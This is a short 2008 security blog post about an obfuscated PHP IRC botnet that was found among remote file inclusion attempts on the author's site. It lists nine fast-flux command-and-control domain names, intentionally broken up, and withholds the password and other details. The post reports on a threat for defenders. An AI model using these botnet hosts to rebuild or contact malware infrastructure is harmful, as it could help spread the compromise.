« Wierd exploitation attempts
Are Nigerians Evolving From The 419 Letters? »

PHP based IRC botnet, fast-flux of course

I was checking out the various RFI (Remote File Inclusion) exploits thrown at my site when I saw an exploit file that was heavily obfuscated. I meddled with the code a bit and got it to reveal the C&C servers:

ko .dd.blueline.be
mymusics .dnip.net
himan .opendns.be
myphone3 .dnip.net
xphon3 .opendns.be
p4n33123e .dd.blueline.be
mymusicband .weedns.com
myphonenumber .weedns.com
ieatironx .weedns.com

The domain names are broken on purpose. The servers run a modified IRC server at a non-standard IRC port. I also left out the server password and other data to prevent further exploitation.

It’s not too common yet to see PHP based botnets, but throwing in the heavy obfuscation on the code and the fast-fluxing of the C&C’s make this one an interesting case.

This entry was posted on Wednesday, January 30th, 2008 at 10:36 am and is filed under General InfoSec, Malware FreakShow. You can follow any responses to this entry through the RSS 2.0 feed. Responses are currently closed, but you can trackback from your own site.

Comments are closed.

If you want to comment on this article please send e-mail
to authors(_at_)teamfurry.com or go to the forums.

InspectorWordpress has prevented 2 attacks.